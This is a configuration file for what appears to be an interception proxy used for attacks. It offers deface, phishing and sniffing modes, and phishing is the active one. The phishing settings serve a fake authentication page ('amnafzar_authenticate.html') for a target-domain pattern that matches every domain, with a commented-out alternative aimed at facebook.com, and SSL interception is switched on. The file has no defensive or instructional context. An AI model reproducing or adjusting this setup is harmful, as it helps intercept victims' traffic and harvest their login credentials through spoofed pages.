#################################################
############### Engine config ###################
proxy.server.port=4428
web.server.port=4429

#################################################
############### Attack config ###################
#mode=deface
mode=phishing
#mode=sniff

#################################################
############### Deface config #################
deface.page=amnafzar_authenticate.html

#################################################
############### Phishing config #################
#phishing.method=smart
phishing.method=static

#phishing.target.domain=^(.*\\.+)*facebook.com
phishing.target.domain=^(.*\\.+)*
phishing.page=amnafzar_authenticate.html
#################################################
################# Log config ####################
log.level=5

#################################################
################## ? config #####################
ssl=enable
#ssl=disable
